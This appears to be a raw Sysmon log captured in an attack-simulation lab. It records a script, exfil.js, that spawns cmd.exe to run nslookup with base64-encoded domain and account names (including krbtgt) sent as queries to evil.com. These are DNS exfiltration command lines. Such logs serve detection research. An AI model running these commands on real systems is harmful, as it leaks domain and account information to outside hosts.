14:16:40.206{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202869Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.206{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202868Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.206{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202867Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.206{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202866Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.206{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C8-629A-6F41-000000005F02}6888C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202865Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.206{2E1864BB-17C8-629A-6D41-000000005F02}22401036C:\Windows\system32\cmd.exe{2E1864BB-17C8-629A-6F41-000000005F02}6888C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202864Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.217{2E1864BB-17C8-629A-6F41-000000005F02}6888C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C8-629A-6D41-000000005F02}2240C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllizop.tmp 2>&1 354300x8000000000000000202863Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.663{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52956- 354300x8000000000000000202862Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.663{00000000-0000-0000-0000-000000000000}5724<unknown process>-udptruefalse127.0.0.1-52956-false127.0.0.1-53domain 354300x8000000000000000202861Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.560{00000000-0000-0000-0000-000000000000}2032<unknown process>-udpfalsefalse127.0.0.1-52955-false127.0.0.1-53domain 354300x8000000000000000202860Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.559{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52955- 354300x8000000000000000202859Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.559{00000000-0000-0000-0000-000000000000}2032<unknown process>-udptruefalse127.0.0.1-52955-false127.0.0.1-53domain 10341000x8000000000000000202858Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.191{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C8-629A-6E41-000000005F02}4212C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202857Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.191{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C8-629A-6E41-000000005F02}4212C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202856Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.175{2E1864BB-17C8-629A-6E41-000000005F02}42124100C:\Windows\system32\conhost.exe{2E1864BB-17C8-629A-6D41-000000005F02}2240C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202855Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.160{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C8-629A-6E41-000000005F02}4212C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202854Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.160{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202853Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.160{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202852Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.160{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202851Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.160{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202850Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.160{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C8-629A-6D41-000000005F02}2240C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202849Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.160{2E1864BB-17A1-629A-783D-000000005F02}55524804C:\Windows\System32\WScript.exe{2E1864BB-17C8-629A-6D41-000000005F02}2240C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202848Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.163{2E1864BB-17C8-629A-6D41-000000005F02}2240C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllizop.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000202847Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.144{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlpirp.tmpMD5=F2DEA30CCAFC980D2EE697947950EBBC,SHA256=F1E23F5C438D3FDCE7F81A746C6D3B73A4C9E6300EF433F28E2B4040CD435CFE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000202846Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.122{2E1864BB-17C8-629A-6B41-000000005F02}48362088C:\Windows\system32\conhost.exe{2E1864BB-17C8-629A-6C41-000000005F02}6408C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202845Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.105{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202844Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.105{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202843Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.105{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202842Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.105{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202841Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.105{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C8-629A-6C41-000000005F02}6408C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202840Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.105{2E1864BB-17C8-629A-6A41-000000005F02}47965196C:\Windows\system32\cmd.exe{2E1864BB-17C8-629A-6C41-000000005F02}6408C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202839Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.118{2E1864BB-17C8-629A-6C41-000000005F02}6408C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXGtyYnRndA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C8-629A-6A41-000000005F02}4796C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpirp.tmp 2>&1 10341000x8000000000000000202838Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.074{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C8-629A-6B41-000000005F02}4836C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202837Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.074{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C8-629A-6B41-000000005F02}4836C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202836Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.074{2E1864BB-17C8-629A-6B41-000000005F02}48362088C:\Windows\system32\conhost.exe{2E1864BB-17C8-629A-6A41-000000005F02}4796C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202835Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 